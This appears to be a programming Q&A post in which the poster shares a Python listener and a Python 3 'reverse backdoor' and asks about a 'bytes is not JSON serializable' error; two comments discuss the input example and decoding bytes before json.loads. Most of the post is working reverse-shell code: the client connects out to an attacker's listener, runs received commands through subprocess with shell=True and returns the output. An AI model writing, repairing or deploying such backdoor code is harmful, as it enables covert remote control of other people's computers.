# I get this error i get this Error "Object of type bytes is not JSON serializable" while testing my reverse_backdoor aganist my real computer

Tags: json, python-3.x, sockets, python-2.x

I have python 2 on my VM and my code is as follows:

```py
#!/usr/bin/env python

import socket, json


class Listener:
    def __init__(self, ip, port):
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((ip, port))
        listener.listen(0)
        print("[+] Waiting for incoming connection")
        self.connection, address = listener.accept()
        print("[+] Got a connection from " + str(address))

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def reliable_recieve(self):
        json_data = ""
        while True:
            try:
                json_data = json_data + self.connection.recv(1024)
                return json.loads(json_data)
            except ValueError:
                continue

    def execute_remotely(self, command):
        self.reliable_send(command)
        return self.reliable_recieve()

    def run(self):
        while True:
            command = raw_input(">> ")
            result = self.execute_remotely(command)
            print(result)


my_listener = Listener("ip adress", 4444)
my_listener.run()
```

And my target computer has python 3 and the code as follows:

```py
#!/usr/bin/env python

import socket, subprocess
import json

class Backdoor:
    def __init__(self, ip, port):
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connection.connect((ip, port))

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def reliable_recieve(self):
        json_data = ""
        while True:
            try:
                json_data = json_data + self.connection.recv(1024)
                return json.loads(json_data)
            except ValueError:
                continue

    def execute_system_command(self, command):
        return subprocess.check_output(command, shell=True)

    def run(self):
        while True:
            command = self.reliable_recieve()
            command_result = self.execute_system_command(command)
            self.reliable_send(command_result)
        connection.close()



my_backdoor = Backdoor("ip address", 4444)
my_backdoor.run()
```

When I run this I get the error mentioned in the subject. I have tried to decode the `json_data` with the utf-8 argument but the problem persists.

i get this screen. The listener model is working in my VM but in my real pc its show this error

[enter image description here](https://i.stack.imgur.com/LlxY4.png)

and if i decode my json_data its show the error  "Object of type bytes is not JSON serializable"

Comment: It looks like your question doesn't quite contain a [minimal reproducible example](https://stackoverflow.com/help/minimal-reproducible-example). It would help if you edit the post to include a specific input, your expected output, and how the code currently differs. If you're getting a backtrace, you should post the backtrace in full.

Comment: In python2, there is no real distinction between `str` and `bytes`. In python3, the two are completely distinct and may not be interchanged. So, you need to receive your entire buffer (it is sent/received as `bytes` for python3), then `decode` it -- probably as utf8. Only then -- once you have a python3 `str` -- do you attempt `json.loads` on it.